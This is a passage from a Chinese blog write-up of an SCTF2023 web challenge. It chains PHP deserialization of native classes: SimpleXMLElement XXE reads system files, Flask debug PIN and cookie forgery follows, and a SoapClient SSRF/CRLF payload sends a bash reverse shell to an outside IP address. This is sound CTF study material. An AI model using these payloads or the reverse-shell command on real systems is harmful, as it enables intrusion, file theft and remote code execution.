<p>一开始看这里我的想法是可能需要控制cookie中的type和properties中的值，或者是不是可以构造一个SCTF方法，在反序列化的时候进行应用。但是很快发现这样行不通，不过type和properties的值可以通过extract函数控制，这样的话我们就可以控制if的条件判断。</p>
<p>然后就是data的反序列化，这里又有个问题，就是在这段源码里是没有魔术方法的，所以不是按照正常的反序列化的路来走，而是要利用原生类进行反序列化。（又是新的知识点）</p>
<p>这里利用的是SimpleXMLElement进行反序列化，可以实现远程xml文件的载入。</p>
<p>所以要利用这个点来读文件先看看</p>
<p>反序列化的点在if的第二个分支上，先读一个app.py</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$class</span>=<span class="hljs-string">&#x27;SimpleXMLElement&#x27;</span>;<br><span class="hljs-variable">$xml</span>=<span class="hljs-string">&#x27;&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE ANY [&lt;!ENTITY file SYSTEM  &quot;file:///etc/passwd&quot;&gt;]&gt;&lt;xxe&gt;&amp;file;&lt;/xxe&gt;&#x27;</span>;<br><span class="hljs-variable">$arr</span>=<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;properties&#x27;</span>=&gt;<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;$xml&#x27;</span>),<span class="hljs-string">&#x27;type&#x27;</span>=<span class="hljs-variable">$class</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$arr</span>);<br><span class="hljs-comment">#a:2:&#123;s:10:&quot;properties&quot;;a:2:&#123;i:0;s:98:&quot;&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE ANY [&lt;!ENTITY file SYSTEM  &quot;file:///app/app.py&quot;&gt;]&gt;&lt;xxe&gt;&amp;file;&lt;/xxe&gt;&quot;;i:1;s:1:&quot;2&quot;;&#125;s:4:&quot;type&quot;;s:16:&quot;SimpleXMLElement&quot;;&#125;</span><br></code></pre></td></tr></table></figure>

<p>源码如下，debug&#x3D;True，可以尝试进入控制台查看</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask <br><br>app = Flask(__name__) <br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span></span>) </span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>(): <br>	<span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;Hello World!&#x27;</span> <br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>: <br>	app.run(host=<span class="hljs-string">&quot;0.0.0.0&quot;</span>,debug=<span class="hljs-literal">True</span>) <br></code></pre></td></tr></table></figure>

<p>访问console看看</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$arr</span>=<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;properties&#x27;</span>=&gt;<span class="hljs-string">&#x27;console&#x27;</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$arr</span>);<br><span class="hljs-comment">#a:1:&#123;s:10:&quot;properties&quot;;s:7:&quot;console&quot;;&#125;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://gitee.com/shark-rice/images/raw/master/202307230218014.png" srcset="/img/loading.gif" lazyload alt="image-20230713232847848"></p>
<p>这里还有一个之前的功能点没利用到，就是SCTF()，我之前的想法是构造一个然后在反序列化的时候执行，但是仔细一想就知道行不通。</p>
<p>这里的正确做法依然是利用PHP原生类反序列化，利用的是SoapClient类。</p>
<blockquote>
<p>PHP 的内置类 SoapClient 是一个专门用来访问web服务的类，可以提供一个基于SOAP协议访问Web服务的 PHP 客户端。</p>
</blockquote>
<p>SoapClient类内部有一个__call()魔术方法，利用访问sctf()这个不存在的方法可触发该魔术方法</p>
<blockquote>
<p>当 <code>__call</code> 方法被触发后，它可以发送 HTTP 和 HTTPS 请求。正是这个 <code>__call</code> 方法，使得 SoapClient 类可以被我们运用在 SSRF 中。SoapClient 这个类也算是目前被挖掘出来最好用的一个内置类。</p>
<p>该类的构造函数如下：</p>
<figure class="highlight lasso"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lasso">&gt;<span class="hljs-keyword">public</span> SoapClient <span class="hljs-type">:: SoapClient</span>(mixed $wsdl <span class="hljs-meta">[</span>，<span class="hljs-built_in">array</span> $options <span class="hljs-meta">]</span>)<br></code></pre></td></tr></table></figure>

<ul>
<li>第一个参数是用来指明是否是wsdl模式，将该值设为null则表示非wsdl模式。</li>
</ul>
</blockquote>
<ul>
<li>第二个参数为一个数组，如果在wsdl模式下，此参数可选；如果在非wsdl模式下，则必须设置location和uri选项，其中location是要将请求发送到的SOAP服务器的URL，而uri 是SOAP服务的目标命名空间。</li>
</ul>
<p>这里的做法是利用SoapClient类进行SSRF+CRLF利用组合拳。</p>
<p>在本地搭建flask调试，输入pin码可以看到如下参数</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">GET</span> /console?<span class="hljs-attribute">__debugger__</span>=<span class="hljs-literal">yes</span>&amp;cmd=pinauth&amp;pin=310-566-904&amp;s=m2gd46SPCKq3xBvkONlJ<br></code></pre></td></tr></table></figure>

<ul>
<li>__debugger__：调试模式的是否开启</li>
<li>cmd：输入的命令</li>
<li>pin：即pin码</li>
<li>s：代表secret</li>
</ul>
<p>我们进入控制台后会返回一个cookie</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">__wzd148551f810a0da4e55b5</span>=<span class="hljs-number">1689267106</span>|d9bcbb95c7f2<br></code></pre></td></tr></table></figure>

<p>cookie格式如下</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">Cookie: <span class="hljs-attribute">cookieName</span>=时间戳|hash签名<br></code></pre></td></tr></table></figure>

<p>进入控制台后输入命令可以看到有如下参数</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">GET</span> /console?&amp;<span class="hljs-attribute">__debugger__</span>=<span class="hljs-literal">yes</span>&amp;cmd=whoami&amp;frm=0&amp;s=m2gd46SPCKq3xBvkONlJ<br></code></pre></td></tr></table></figure>

<p>这里的思路是伪造cookie然后命令执行反弹shell</p>
<p>其中secret我们可以通过访问&#x2F;console获得。</p>
<p>cookie伪造&amp;pin码爆破脚本：<a target="_blank" rel="noopener" href="https://github.com/WiIs0n/Flask-cookie-generation-based-on-PIN-code">https://github.com/WiIs0n/Flask-cookie-generation-based-on-PIN-code</a></p>
<p>需要提供的参数有<code>username</code>、<code>modname</code>、<code>appname</code>、<code>basefile</code>、<code>uuid</code>、<code>machineid</code>。</p>
<p>获得方式如下</p>
<ul>
<li>username：查看&#x2F;etc&#x2F;passwd 一般是app</li>
<li>modename: 默认flask.app</li>
<li>uuid：&#x2F;sys&#x2F;class&#x2F;net&#x2F;eth0&#x2F;address 16进制转10进制</li>
<li>machineid：machine_id由三个合并(docker环境就只需后两个)：1.&#x2F;etc&#x2F;machine-id 2.&#x2F;proc&#x2F;sys&#x2F;kernel&#x2F;random&#x2F;boot_id 3.&#x2F;proc&#x2F;self&#x2F;cgroup</li>
<li>basefile：&#x2F;usr&#x2F;lib&#x2F;python3.8&#x2F;site-packages&#x2F;flask&#x2F;app.py （默认路径）</li>
</ul>
<blockquote>
<p>伪造以前首先需要知道python的版本，我们查询一下是否存在 python3.8路径的<code>LICENSE.txt</code></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">&gt;<span class="hljs-regexp">/usr/</span>lib<span class="hljs-regexp">/python3.8/</span>LICENSE.txt<br></code></pre></td></tr></table></figure>
</blockquote>
<p>以上文件皆使用XXE来读取</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$class</span>=<span class="hljs-string">&#x27;SimpleXMLElement&#x27;</span>;<br><span class="hljs-variable">$xml</span>=<span class="hljs-string">&#x27;&lt;?xml version=&quot;1.0&quot;?&gt;&lt;!DOCTYPE ANY [&lt;!ENTITY file SYSTEM  &quot;文件路径&quot;&gt;]&gt;&lt;xxe&gt;&amp;file;&lt;/xxe&gt;&#x27;</span>;<br><span class="hljs-variable">$arr</span>=<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;properties&#x27;</span>=&gt;<span class="hljs-keyword">array</span>(<span class="hljs-variable">$xml</span>,<span class="hljs-string">&#x27;2&#x27;</span>),<span class="hljs-string">&#x27;type&#x27;</span>=&gt;<span class="hljs-variable">$class</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$arr</span>);<br></code></pre></td></tr></table></figure>



<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs xml">a:2:&#123;s:10:&quot;properties&quot;;a:2:&#123;i:0;s:98:&quot;<span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span>?&gt;</span><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">ANY</span> [<span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">file</span> <span class="hljs-keyword">SYSTEM</span>  <span class="hljs-string">&quot;file:///etc/passwd&quot;</span>&gt;</span>]&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">xxe</span>&gt;</span><span class="hljs-symbol">&amp;file;</span><span class="hljs-tag">&lt;/<span class="hljs-name">xxe</span>&gt;</span>&quot;;i:1;s:1:&quot;2&quot;;&#125;s:4:&quot;type&quot;;s:16:&quot;SimpleXMLElement&quot;;&#125;<br><br>02:42:ac:13:00:02 =&gt;2661721902<br> <br>a:2:&#123;s:10:&quot;properties&quot;;a:2:&#123;i:0;s:118:&quot;<span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span>?&gt;</span><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">ANY</span> [<span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">file</span> <span class="hljs-keyword">SYSTEM</span>  <span class="hljs-string">&quot;file:///proc/sys/kernel/random/boot_id&quot;</span>&gt;</span>]&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">xxe</span>&gt;</span><span class="hljs-symbol">&amp;file;</span><span class="hljs-tag">&lt;/<span class="hljs-name">xxe</span>&gt;</span>&quot;;i:1;s:1:&quot;2&quot;;&#125;s:4:&quot;type&quot;;s:16:&quot;SimpleXMLElement&quot;;&#125;<br><br>349b3354-f67f-4438-b395-4fbc01171fdd<br><br>a:2:&#123;s:10:&quot;properties&quot;;a:2:&#123;i:0;s:104:&quot;<span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span>?&gt;</span><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">ANY</span> [<span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">file</span> <span class="hljs-keyword">SYSTEM</span>  <span class="hljs-string">&quot;file:///proc/self/cgroup&quot;</span>&gt;</span>]&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">xxe</span>&gt;</span><span class="hljs-symbol">&amp;file;</span><span class="hljs-tag">&lt;/<span class="hljs-name">xxe</span>&gt;</span>&quot;;i:1;s:1:&quot;2&quot;;&#125;s:4:&quot;type&quot;;s:16:&quot;SimpleXMLElement&quot;;&#125;<br><br>96f7c71c69a673768993cd951fedeee8e33246ccc0513312f4c82152bf68c687 <br></code></pre></td></tr></table></figure>

<p>获得了这些数据之后可以开始伪造cookie</p>
<figure class="highlight maxima"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs maxima">python3 <span class="hljs-built_in">exp</span>.py --username app --modname flask.app --appname Flask --basefile /usr/lib/python3<span class="hljs-number">.8</span>/site-packages/flask/app.py --uuid <span class="hljs-number">2485378023426</span> --machineid <span class="hljs-number">349b3354</span>-f67f-<span class="hljs-number">4438</span>-b395-4fbc01171fdd96f7c71c69a673768993cd951fedeee8e33246ccc0513312f4c82152bf68c687<br></code></pre></td></tr></table></figure>

<p>结果如下</p>
<p><img src="https://gitee.com/shark-rice/images/raw/master/202307230218824.png" srcset="/img/loading.gif" lazyload alt="image-20230714153646385"></p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">Cookie</span>:  __wzdb2a60e2b19822632a67c=<span class="hljs-number">1689320197</span>|<span class="hljs-number">11</span>b8517fb9fb<br><span class="hljs-attribute">PIN</span>:  <span class="hljs-number">121</span>-<span class="hljs-number">260</span>-<span class="hljs-number">582</span><br></code></pre></td></tr></table></figure>

<p>通过soapclient去访问debug界面，同时也只有soapclient可以做到携带cookie访问</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-variable">$target</span> = <span class="hljs-string">&#x27;http://127.0.0.1:5000/console?&amp;__debugger__=yes&amp;cmd=__import__(&quot;os&quot;).popen(&quot;bash -c \&quot;bash -i &gt;&amp; /dev/tcp/124.223.5.175/9080 &lt;&amp;1\&quot;&quot;)&amp;frm=0&amp;s=ECDJpSJ4XJ5AZJtaxMHT&#x27;</span>;<br><span class="hljs-variable">$headers</span> = <span class="hljs-keyword">array</span>(<br>    <span class="hljs-string">&#x27;X-Forwarded-For: 127.0.0.1&#x27;</span>,<br>    <span class="hljs-string">&#x27;Cookie: __wzdb2a60e2b19822632a67c=1689320197|11b8517fb9fb&#x27;</span><br>);<br><span class="hljs-variable">$b</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">SoapClient</span>(<span class="hljs-literal">null</span>,<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;location&#x27;</span> =&gt; <span class="hljs-variable">$target</span>,<br>                               <span class="hljs-string">&#x27;user_agent&#x27;</span> =&gt;<span class="hljs-string">&quot;sammy\r\n&quot;</span>.<span class="hljs-title function_ invoke__">join</span>(<span class="hljs-string">&quot;\r\n&quot;</span>,<span class="hljs-variable">$headers</span>),<br>                               <span class="hljs-string">&#x27;uri&#x27;</span>=&gt; <span class="hljs-string">&quot;http://127.0.0.1:5000/&quot;</span>));<br><span class="hljs-variable">$arr</span>=<span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;properties&quot;</span>=&gt;<span class="hljs-title function_ invoke__">urlencode</span>(<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$b</span>)));<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$arr</span>);<br><br><span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure>

<p>不知道什么原因现在反弹不了shell，试了好几天了，中间有一次好不容易反弹出来了但又不知道怎么搞的让我弄断了，太搞心态了😭😭😭。但是步骤就是这样。这题也就记录到这里了。看其他师傅的wp是说后面使用SUID提权读flag。</p>
<p>最后感谢Boogipop师傅的解惑</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>SCTF2023</div>
      <div>https://sammylingsj.github.io/2023/07/23/SCTF2023/SCTF2023/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>s4mmy</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年7月23日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/07/01/%E4%B8%80%E9%81%93nodejs%E6%B1%A1%E6%9F%93+jwt%E7%88%86%E7%A0%B4%E7%9A%84%E9%A2%98/Nodejs%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" title="一道nodejs污染+jwt爆破的题">
                        <span class="hidden-mobile">一道nodejs污染+jwt爆破的题</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>s4mmy</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
